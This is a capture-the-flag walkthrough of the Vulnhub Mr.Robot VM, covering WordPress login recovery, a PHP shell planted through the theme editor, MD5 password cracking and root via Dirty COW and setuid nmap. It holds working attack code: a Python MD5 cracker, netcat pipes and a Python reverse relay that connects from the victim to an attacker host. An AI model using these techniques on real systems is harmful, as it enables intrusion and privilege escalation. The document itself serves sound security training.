[Vulnhub] Mr.Robot - Walkthrough

VM Download page



First a quick nmap scan:

root@kali:~/vulnerhub/mrrobot# nmap -sC -Pn

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-29 14:25 EDT  
Nmap scan report for whoismrrobot.com (  
Host is up (-0.052s latency).  
Not shown: 997 filtered ports  
22/tcp  closed ssh  
80/tcp  open   http  
|_http-title: Site doesn't have a title (text/html).
443/tcp open   https  
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:C0:2C:86 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds  

Check out port 80:

It's an awesome web page which emulates the show.

I tried every command available here and found nothing useful (there are even several videos about Mr. Robot).

Start to hunt the prey

Check out /robots.txt:

User-agent: *  

There is the first flag:

fsocity.dic must be a dictionary. Let's run dirb with this .dic:

root@kali:~/vulnerhub/mrrobot# dirb fsocity.dic 

DIRB v2.22  
By The Dark Raver  

START_TIME: Tue Aug 29 16:00:38 2017  
WORDLIST_FILES: fsocity.dic


GENERATED WORDS: 11452                                                         

---- Scanning URL: ----
==> DIRECTORY:                                   
==> DIRECTORY:                                      
==> DIRECTORY:                                    
+ (CODE:200|SIZE:309)                            
==> DIRECTORY:                                     
==> DIRECTORY:                                    
==> DIRECTORY:                                    
==> DIRECTORY:                                    
==> DIRECTORY:                                     
==> DIRECTORY:                                    
+ (CODE:200|SIZE:516314)                           
+ (CODE:301|SIZE:0)                                  
+ (CODE:302|SIZE:0)                                
+ (CODE:200|SIZE:64)            

END_TIME: Tue Aug 29 16:34:36 2017  
DOWNLOADED: 12185 - FOUND: 5  

Then I started browsing all those links, checking the source code and the network traffic at the same time.

It appears that this is a WordPress (:D) blog. But wpscan turned up nothing interesting, even with several combinations of parameters.

So I kept checking all the URLs.
When checking /license, I saw a blank page except for the following line:

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?  

But if you scroll down or check the source code, you'll find a key:

do you want a password or something?  
root@kali:~/vulnerhub/mrrobot# echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d  
elliot:ER28-0652

Great, now we have a login credential.

BTW, I checked whether the password is in the .dic and found:

root@kali:~/vulnerhub/mrrobot# grep ER28-0652 fsocity.dic  

Later on I realized that you can probably find a URL like "......./author/elliot" (WordPress author pages leak the username), and then just brute-force the login with hydra and that .dic.

But anyway, we are now logged in to WP.

Get a shell

I tried to zip a php-reverse-shell.php, upload the zip as a plugin and activate it to receive the shell, but it didn't work.

Then the super Chao (also known as evilC) came by and gave a big hint: navigate to Appearance > Editor, click header.php or some other .php file on the right side, add your PHP shell code to the content, update it, then browse the WP blog and enjoy your shell. It works!

$ id    
uid=1(daemon) gid=1(daemon) groups=1(daemon)  
$ w
 19:08:17 up  1:37,  0 users,  load average: 0.00, 0.01, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT  
$ uname -a
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux  
$ python -c "import pty;pty.spawn('/bin/bash');"

Get robot privileges

daemon@linux:/home/robot$ ls -l  
ls -l  
total 8  
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
daemon@linux:/home/robot$ cat password.raw-md5  
cat password.raw-md5  

We need robot's or root's privileges to get the second flag, and there happens to be a password file under robot's home. "What a coincidence!" :D

root@kali:~/vulnerhub/mrrobot# john --format=raw-md5 pwd.hash --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8  
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])  
Press 'q' or Ctrl-C to abort, almost any other key for status  
abcdefghijklmnopqrstuvwxyz (?)  
1g 0:00:00:00 DONE (2017-08-29 16:49) 6.666g/s 269360p/s 269360c/s 269360C/s abygail..TERRELL  
Use the "--show" option to display all of the cracked passwords reliably  
Session completed  

Cool, now we have robot's password!
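For anyone who wants to see what john is doing with --format=raw-md5, here is a small cracker as an added example (not the author's code and not john's). The hash file it starts from is constructed: the digest is the MD5 of the lowercase alphabet, which is the password john recovered above and also a test vector in RFC 1321, paired with the robot user; the inline wordlist stands in for rockyou.txt. The thing to take away is that an unsalted hash costs one MD5 per candidate for every user at once, which is why a file like this falls instantly.

```python
# Cracking an unsalted MD5 password file the way john --format=raw-md5 does.
# Added example, not from the walkthrough. SAMPLE_HASH_FILE is constructed:
# MD5("abcdefghijklmnopqrstuvwxyz") from the RFC 1321 test suite, i.e. the
# password john recovered, paired with the robot user. SAMPLE_WORDLIST stands
# in for rockyou.txt; __main__ takes real files.
import hashlib
import sys

SAMPLE_HASH_FILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"
SAMPLE_WORDLIST = ["123456", "password", "abcdefghijklmnopqrstuvwxyz", "qwerty"]

# A few john-style mangling rules; each maps a wordlist entry to a variant.
DEFAULT_RULES = (str.capitalize, str.upper, lambda w: w + "1", lambda w: w + "123")


def md5_hex(text):
    """Hex MD5 of a candidate. surrogateescape round-trips raw bytes from a
    wordlist that is not valid UTF-8 (rockyou.txt is not)."""
    return hashlib.md5(text.encode("utf-8", "surrogateescape")).hexdigest()


def parse_raw_md5(text):
    """Parse 'user:hexhash' lines (john's input format; a bare hash gets the
    user '?'). Returns {hash: user}. Hex is lowercased so lookups are
    case-insensitive; anything that is not 32 hex digits is rejected."""
    targets = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, digest = line.rpartition(":")
        digest = digest.lower()
        if len(digest) != 32 or set(digest) - set("0123456789abcdef"):
            raise ValueError("not a raw MD5 hash: %r" % line)
        targets[digest] = user or "?"
    return targets


def crack(targets, wordlist, rules=()):
    """Dictionary attack. Raw MD5 is unsalted, so each candidate is hashed
    once and looked up against all target hashes at the same time.
    Returns {user: password} for whatever was found."""
    found = {}
    for word in wordlist:
        word = word.rstrip("\r\n")
        if not word:
            continue
        for candidate in [word] + [rule(word) for rule in rules]:
            user = targets.get(md5_hex(candidate))
            if user is not None and user not in found:
                found[user] = candidate
        if len(found) == len(targets):
            break
    return found


if __name__ == "__main__":
    # usage: python crack_md5.py password.raw-md5 /usr/share/wordlists/rockyou.txt
    with open(sys.argv[1]) as fh:
        targets = parse_raw_md5(fh.read())
    with open(sys.argv[2], encoding="utf-8", errors="surrogateescape") as words:
        for user, pw in crack(targets, words, DEFAULT_RULES).items():
            print("%s:%s" % (user, pw))
```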

daemon@linux:/home/robot$ su robot  
su robot  
Password: abcdefghijklmnopqrstuvwxyz  
robot@linux:~$ id  
uid=1002(robot) gid=1002(robot) groups=1002(robot)  
robot@linux:~$ cat key-2-of-3.txt  
cat key-2-of-3.txt  

Second flag: 822c73956184f694993bede3eb39f959

Finding my way to root

robot@linux:/home$ ls -l  
ls -l  
total 4  
drwxr-xr-x 2 root root 4096 Nov 13  2015 robot  
robot@linux:~$ cat /etc/passwd  
cat /etc/passwd  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false  

Three users have a home directory set, but the only folder under /home is robot, so I didn't give them much thought.

robot@linux:/home$ netstat -nplt  
netstat -nplt  
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)  
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name  
tcp        0      0  *               LISTEN      -  
tcp        0      0*               LISTEN      -  
tcp        0      0*               LISTEN      -  
tcp6       0      0 :::443                  :::*                    LISTEN      -  
tcp6       0      0 :::80                   :::*                    LISTEN      -  

FTP, MySQL and another service on port 2812 are listening, good.

robot@linux:/var$ ls  
backups  cache    lib  local  lock  log  mail  opt  run  spool  tmp  
robot@linux:/var$ cd mail  
cd mail  
robot@linux:/var/mail$ ls  
robot@linux:/var/mail$ cd ..  
cd ..  
robot@linux:/var$ ls  
backups  cache    lib  local  lock  log  mail  opt  run  spool  tmp  
robot@linux:/var$ cd back  
cd backups/  
robot@linux:/var/backups$ ls  
apt.extended_states.0  group.bak    passwd.bak  
dpkg.status.0           gshadow.bak  shadow.bak  
robot@linux:/var/backups$ cat pass  
cat passwd.bak  
cat: passwd.bak: Permission denied  
robot@linux:/var/backups$ ls -la  
ls -la  
total 356  
drwxr-xr-x  2 root root     4096 Nov 13  2015 .  
drwxr-xr-x 11 root root     4096 Jun 24  2015 ..  
-rw-r--r--  1 root root     7194 Jun 24  2015 apt.extended_states.0
-rw-r--r--  1 root root   331144 Jun 24  2015 dpkg.status.0
-rw-------  1 root root      604 Nov 13  2015 group.bak
-rw-------  1 root shadow    496 Nov 13  2015 gshadow.bak
-rw-------  1 root root     1217 Nov 13  2015 passwd.bak
-rw-------  1 root shadow    885 Nov 13  2015 shadow.bak

Nothing interesting here.

robot@linux:/var/log$ find / -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null  

Nothing interesting here either, except /usr/local/bin/nmap (wtf? there is an nmap?). So I scanned myself with it (just for fun :D):

robot@linux:/var$ nmap localhost  
nmap localhost

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2017-08-29 19:22 UTC  
Interesting ports on localhost (  
(The 1658 ports scanned but not shown below are in state: closed)
21/tcp   open  ftp  
80/tcp   open  http  
443/tcp  open  https  
3306/tcp open  mysql  

It turned out the limit was my own knowledge: this nmap is the way to root. I'll talk about it at the end.

Back to my recon work.
I tried to connect to the FTP server but couldn't figure out the username. Then I found this:

robot@linux:/etc$ cat ftpuser  
cat ftpusers  
# /etc/ftpusers: list of users disallowed FTP access. See ftpusers(5).


And this:

robot@linux:/etc$ cat vsftpd.all  
cat vsftpd.allowed_users  

Alright, now we have a new target: bitnamiftp. Remember, this name also appeared in /etc/passwd

I tried MySQL and got nothing there either.

Then I nc'd to port 2812 (because it showed up in the netstat output). It didn't say anything, so I guessed it might be a web server: I sent GET / HTTP/1.1, hit enter twice and got some HTML back.

At this point I really wanted to see the content in a browser, because 'mysql' and 'ftp' showed up in the ugly HTML.

So I built a temporary proxy (two proxies actually).
On my kali machine:

root@kali:~/vulnerhub/mrrobot# mknod backpipe p  
root@kali:~/vulnerhub/mrrobot# nc -l -k -p 9000 0<backpipe | nc -l -k -p 9001 | tee backpipe  

On the victim machine:

robot@linux:/tmp$ mknod backpipe p  
robot@linux:/tmp$ nc localhost 2812 0<backpipe | nc 9001 | tee backpipe  

Then I typed localhost:9000 into the browser on my kali box and could browse it. But I had to rerun those two nc lines every time I clicked a new link, because the server closes the connection after one exchange. Anyway.
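The two-nc relay works but dies after every response because Monit closes the connection. A small reverse relay in Python, added here as an example and not part of the original write-up, fixes that: the victim keeps one outbound connection parked on the attacker and parks a fresh one whenever a request finishes, so the browser can click around freely. Role names, ports and the ATTACKER_IP placeholder are assumptions; the script runs on the victim's Python 2 as well as on Python 3.

```python
# Reverse TCP relay for a loopback-only service (Monit on the victim's
# 127.0.0.1:2812). Added example, not from the walkthrough; role names, ports
# and the ATTACKER_IP placeholder are assumptions. Runs on Python 2 and 3.
import socket
import sys
import threading

BUFSIZE = 4096


def _pump(src, dst):
    """Copy src -> dst until EOF, then half-close dst so the far side sees
    EOF too (Monit closes after each response; the browser must see that)."""
    try:
        while True:
            data = src.recv(BUFSIZE)
            if not data:
                break
            dst.sendall(data)
    except (OSError, socket.error):
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except (OSError, socket.error):
            pass


def relay(a, b):
    """Relay both ways between connected sockets a and b; returns (and closes
    both) once both directions have reached EOF."""
    threads = [threading.Thread(target=_pump, args=(a, b)),
               threading.Thread(target=_pump, args=(b, a))]
    for t in threads:
        t.daemon = True
        t.start()
    for t in threads:
        t.join()
    a.close()
    b.close()


def _listen(host, port):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(16)
    return srv


def attacker(browser_port, victim_port):
    """Attacker side: browser port on loopback only, victim port on every
    interface; each browser connection is paired with the parked victim one."""
    browser_srv = _listen("127.0.0.1", browser_port)
    victim_srv = _listen("0.0.0.0", victim_port)
    while True:
        victim_conn, _ = victim_srv.accept()    # parked by victim()
        browser_conn, _ = browser_srv.accept()  # next request from the browser
        t = threading.Thread(target=relay, args=(browser_conn, victim_conn))
        t.daemon = True
        t.start()


def victim(attacker_host, attacker_port, target_host, target_port):
    """Victim side: park one outbound connection on the attacker, wait for the
    first bytes of a request before opening the local service (so its idle
    timeout is not hit), relay until both sides close, then park a new one."""
    while True:
        remote = socket.create_connection((attacker_host, attacker_port))
        first = remote.recv(BUFSIZE)
        if not first:          # browser opened a connection but sent nothing
            remote.close()
            continue
        local = socket.create_connection((target_host, target_port))
        local.sendall(first)
        relay(remote, local)


def loopback_check():
    """Offline check of relay(): two socketpairs stand in for the
    browser<->attacker and victim<->service legs. Returns what each end got
    and whether the relay shut down cleanly."""
    client, relay_in = socket.socketpair()
    relay_out, service = socket.socketpair()
    t = threading.Thread(target=relay, args=(relay_in, relay_out))
    t.start()
    client.sendall(b"GET / HTTP/1.0\r\n\r\n")
    request = service.recv(BUFSIZE)
    service.sendall(b"HTTP/1.0 200 OK\r\n\r\nmonit")
    response = client.recv(BUFSIZE)
    service.close()
    client.close()
    t.join(5)
    return request, response, not t.is_alive()


if __name__ == "__main__":
    # attacker:  python relay.py attacker 9000 9001
    # victim:    python relay.py victim ATTACKER_IP 9001 127.0.0.1 2812
    if sys.argv[1:2] == ["attacker"]:
        attacker(int(sys.argv[2]), int(sys.argv[3]))
    elif sys.argv[1:2] == ["victim"]:
        victim(sys.argv[2], int(sys.argv[3]), sys.argv[4], int(sys.argv[5]))
    else:
        print(loopback_check())
```

Start the attacker side first, then copy the script to the victim (e.g. into /tmp) and start the victim side from the shell you already have; after that, http://127.0.0.1:9000/ on the kali box follows every link without re-running anything. Browser connections are served one at a time because the victim only parks one connection, which is fine for clicking through Monit.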

It turns out this is the Monit Service Manager page.
I re-ran those two nc lines and browsed to apache.

Here, ammmmm, I thought I had found the name again: bitnamiftp, but it turned out not to be the username, and checking the /opt/bitnami/ directory cost me a lot of time.

Actual root

After all that work, I decided to use the dirty way to root it...
(actually I'd been holding this idea back since I saw uname -a report a 3.13.0 kernel.)

I tried overlayfs (CVE-2015-1328), which didn't work: the 3.13.0-55 build from June 2015 already carries that fix. Then the 'super' Dirty COW (CVE-2016-5195) root, and it worked! Note that cowroot overwrites /usr/bin/passwd, so restore it from /tmp/bak afterwards, and the race can leave the box unstable, so snapshot the VM first.

robot@linux:/tmp$ ./cowroot  
DirtyCow root privilege escalation  
Backing up /usr/bin/passwd to /tmp/bak  
Size of binary: 47032  
Racing, this may take a while..  
thread stopped  
thread stopped  
/usr/bin/passwd overwritten
Popping root shell.  
Don't forget to restore /tmp/bak  
root@linux:/tmp# id  
uid=0(root) gid=1002(robot) groups=0(root),1002(robot)  
root@linux:/tmp# cd /root  
cd /root  
root@linux:/root# ls  
firstboot_done  key-3-of-3.txt  
root@linux:/root# cat key  
cat key-3-of-3.txt  

Third flag: 04787ddef27c3dee1ee161b21670b4e4
Great! Now I'm done.

nmap to root

If you type nmap --interactive and then !sh, you are root (god damn it, how could I learn about this so late! But thank god I know it now). This works because that nmap is setuid root, so the shell it spawns inherits euid 0.
I learned this from this video. Thanks a lot!
But if you type !bash, you won't get a root shell: bash drops a setuid effective uid back to the real uid at startup unless it is started with -p, so use !bash -p instead (sh has no such check).

flag ∈ hash?

After getting root, I checked others' walkthroughs and someone said the flags might be MD5 hash strings, which I hadn't considered before.
So I tried to crack them with both fsocity.dic and rockyou.txt, and also on md5decrypt.net, but got nothing interesting, so I suppose they are just flags rather than hints.

Alright, thanks for watching!